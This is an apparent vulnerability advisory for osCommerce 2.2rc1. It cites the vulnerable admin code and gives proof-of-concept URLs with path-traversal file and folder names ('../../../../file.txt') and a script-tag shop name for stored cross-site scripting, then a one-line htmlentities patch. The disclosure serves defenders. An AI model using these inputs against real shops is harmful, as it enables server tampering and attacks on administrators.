osCommerce version 2.2rc1 suffers from cross site scripting and file/directory creation vulnerabilities.
7920e1028d29b538f14b91648b11b2d0f8fc7ccbef4c24bb42acb872e09bc150
#####################################################################################################
#
# Module : osCommerce
# Version : 2.2rc1
# Edited by : oscommerce.com/
# Download : http://www.oscommerce.com/
# Download(fr) : http://www.oscommerce-fr.info/portail/index.php?option=com_remository&Itemid=183
#
# Vulnerability : Multiple Vulnerability
#
# Author : Jonathan Salwan
# Mail : submit [AT] shell-storm.org
# Web : http://www.shell-storm.org
#
####################################################################################################
# Create file on the server
# Proof of Concept
####################################################################################################
#
# File : catalog/admin/file_manager.php
# Code (row 146):
#
# if ($action == 'new_file') {
# $filename_input_field = tep_draw_input_field('filename');
#
# Use vul:
# --------
# http://localhost/catalog/admin/file_manager.php?action=new_file
# file name => ../../../../../../../../file.txt
#
####################################################################################################
# Create folder on the server
# Proof of Concept
####################################################################################################
#
# File : catalog/admin/file_manager.php
# Code (row 296):
#
# $contents[] = array('text' => '<br>' . TEXT_FILE_NAME . '<br>' . tep_draw_input_field('folder_name'));
#
# Use vul:
# --------
# http://localhost/catalog/admin/file_manager.php?action=new_folder
# folder name => ../../../../../../../../folder_test
#
####################################################################################################
# XSS Vulnerability Proof of Concept
####################################################################################################
#
# File : catalog/admin/index.php
# Code (row 58) :
#
# <td class="pageHeading"><?php echo STORE_NAME; ?></td>
#
#
# Use vul:
# --------
# http://localhost/catalog/admin/configuration.php?gID=1&cID=1&action=edit
# Shop Name => <script>alert('xss');</script>
#
####################################################################################################
# PATCH catalog/admin/index.php
####################################################################################################
#
# replaces code : <td class="pageHeading"><?php echo STORE_NAME; ?></td>
# to : <td class="pageHeading"><?php echo htmlentities(STORE_NAME); ?></td>
#
#